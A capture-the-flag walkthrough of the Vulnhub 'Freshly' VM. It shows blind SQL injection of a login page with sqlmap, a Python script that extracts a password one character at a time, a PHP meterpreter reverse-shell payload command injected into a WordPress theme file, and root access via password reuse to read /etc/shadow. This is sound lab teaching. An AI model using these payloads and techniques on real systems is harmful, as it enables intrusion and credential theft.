Freshly VM challenge

Blog post
Vulnhub

Download the VM: https://copy.com/I2tKBVNONgFrLZGK
View The Readme File: https://copy.com/tNj9nDzqKvefsBQe

The goal of this challenge is to break into the machine via the web and 
find the secret hidden in a sensitive file. If you can find the secret, 
send me an email for verification. :)

There are a couple of different ways that you can go with this one. Good luck!

Simply download and import the OVA file into virtualbox!

The Readme File:

FRESHLY VIRTUALBOX APPLIANCE
THIS WAS MADE WITH VIRTUALBOX 4.3.22!
JUST GO TO FILE AND IMPORT APPLIANCE, SELECT THE OVA FILE!


FRESHLY OS = UBUNTU 14.04 32BIT

CHALLENGE:

YOU MUST GAIN ACCESS TO THE SYSTEM AND FIND THE "SECRET" IN A SENSITIVE FILE.
SEND THE SECRET TO ADMIN [A] TOP-HAT-SEC.COM

THERE ARE A COUPLE WAYS THAT YOU CAN GAIN ACCESS TO THE SYSTEM VIA THE WEB.

GOOD LUCK!

Disclaimer: there are a couple of misleading vulnerabilities that (as far as I know) are not exploitable on this VM. I will not mention them and will just do a walkthrough.

Freshly VM: 192.168.0.131
Attacking IP: 192.168.0.108

First, let’s do a port-scan and check out what’s open.

[Image: nmap-freshly (nmap port scan of the Freshly VM)]

So there are three open ports on the machine. First I check out port 80 and am greeted by a picture. It seems likely that there is something more hidden on port 80, so let's run DirBuster against it. I only ran the default small dictionary for a couple of seconds before I got a hit on something interesting.



[Image: dirbuster-freshly (DirBuster results for port 80)]


The file login.php looks like a standard login page. Supplying credentials that are highly unlikely to be correct returns a 0. A standard SQLi test yields the same result.


[Image: sqlitest-freshly (first SQLi test against login.php)]



Performing a further test returns a 1 instead of a 0 on the page. Sweet, progress: the application tells us whether the injected query matched a row or not, which is all a boolean-based blind injection needs.

[Image: sqlibypass-freshly (login.php returning 1 after injection)]

[Image: burp-freshly (the login POST request captured in an intercepting proxy)]

Inspecting the source code, or running an intercepting proxy to check what is in the POST data, shows us that there are three variables. We know that we can inject into the username field, so let's take the variables and feed them to sqlmap.

[Image: sqlimap-freshly (sqlmap run against login.php)]


You'll have to click the image to watch it, but in it we can see that there is a blind SQLi. Dumping the database this way takes quite a while, so it's a good time to take a break. After a while we can find the following in the dump:


Database: wordpress8080
Table: users
[1 entry]
+----------+---------------------+
| username | password            |
+----------+---------------------+
| admin    | SuperSecretPassword |
+----------+---------------------+
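The 0/1 responses from login.php are exactly the oracle a boolean-based blind injection needs, which is what sqlmap used to produce the dump above. The Python script below is an added example, not code from this walkthrough or from the VM: it simulates such a login endpoint with an in-memory SQLite table holding the same username and password as the dump, shows why one classic test payload can come back 0 while a comment-terminated one returns 1, recovers the password one character at a time through the oracle, and shows the parameterised query that closes the hole. The SQLite back end, the column names and the query shape are assumptions; the real login.php is not shown on the page.

```python
import sqlite3

# Constructed stand-in for the VM's database (assumption: the real schema is
# not shown, only the dumped row).
DB = sqlite3.connect(":memory:")
DB.execute("CREATE TABLE users (username TEXT, password TEXT)")
DB.execute("INSERT INTO users VALUES ('admin', 'SuperSecretPassword')")
DB.commit()

QUERY_LOG = []  # every question asked through the oracle


def vulnerable_login(username, password):
    """Hypothetical login.php logic: user input is concatenated straight into
    the SQL. Returns 1 if any row matches, 0 otherwise (or on a SQL error)."""
    query = ("SELECT COUNT(*) FROM users WHERE username = '%s' "
             "AND password = '%s'" % (username, password))
    try:
        count = DB.execute(query).fetchone()[0]
    except sqlite3.Error:
        return 0
    return 1 if count > 0 else 0


def safe_login(username, password):
    """Hardened version: bound parameters can never change the query text."""
    row = DB.execute(
        "SELECT COUNT(*) FROM users WHERE username = ? AND password = ?",
        (username, password)).fetchone()
    return 1 if row[0] > 0 else 0


def oracle(condition):
    """Ask the application one yes/no question. The trailing space after '--'
    is what MySQL needs for a comment; SQLite accepts it too."""
    QUERY_LOG.append(condition)
    return vulnerable_login("admin' AND (%s) -- " % condition, "x") == 1


def query_count():
    return len(QUERY_LOG)


def extract_password(username="admin", max_len=40):
    """Boolean-based blind extraction: first the length, then each character
    by binary search over printable ASCII (sqlmap does the same, in bulk)."""
    target = "(SELECT password FROM users WHERE username = '%s')" % username
    length = 0
    for n in range(1, max_len + 1):
        if oracle("length(%s) = %d" % (target, n)):
            length = n
            break
    recovered = ""
    for pos in range(1, length + 1):
        lo, hi = 32, 126  # printable ASCII range
        while lo < hi:
            mid = (lo + hi) // 2
            # unicode() is SQLite's equivalent of MySQL's ASCII()
            if oracle("unicode(substr(%s, %d, 1)) > %d" % (target, pos, mid)):
                lo = mid + 1
            else:
                hi = mid
        recovered += chr(lo)
    return recovered


if __name__ == "__main__":
    # ' OR '1'='1 lands inside "username='' OR ('1'='1' AND password='x')"
    # because AND binds tighter than OR, so the row count stays 0 ...
    print(vulnerable_login("' OR '1'='1", "x"))
    # ... while commenting out the password check returns 1.
    print(vulnerable_login("' OR 1=1 -- ", "x"))
    print(extract_password(), "after", query_count(), "oracle queries")
```

The binary search costs about seven requests per character, so the 19-character password above comes out in roughly 150 requests; that is the "quite a while" in the walkthrough, and it is why sqlmap with a time- or boolean-based technique is slow compared to an error- or UNION-based one. Note that the parameterised version treats the same payloads as literal strings and returns 0 for both.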

These credentials do not work on login.php, so it's time to check the other ports. On port 8080 there is a WordPress installation, and it is possible to log in to the admin panel (http://192.168.0.131:8080/wordpress/wp-admin) with the credentials from the dump. Nice: through the WordPress application it is possible to inject a meterpreter shell, for example by editing a theme file. I generate one with msfpayload (since replaced by msfvenom, which takes the same payload name and LHOST/LPORT options) and inject it into header.php.

msfpayload php/meterpreter/reverse_tcp LHOST=192.168.0.108 LPORT=4444 R


[Image: metwpshell-freshly (PHP meterpreter payload pasted into header.php)]

Now it's time to set up a handler in Metasploit to catch the connection from the Freshly VM. Once the handler is running, we make sure to visit a page that loads header.php on the WordPress site.

[Image: msfcon-freshly (Metasploit handler receiving the meterpreter session)]

Great, we got a meterpreter shell. It is running as daemon, so now we need to escalate to root. We'll try to switch to root with the same credentials that were found in the WordPress database, and password reuse pays off. Voilà, root! Now it's time to find the secret file on the system. This file is most often called something like flag.txt and is usually placed in root's home directory; however, that is not the case this time. The secret is located at the end of /etc/shadow.

[Image: root-freshly (root shell and the secret at the end of /etc/shadow)]


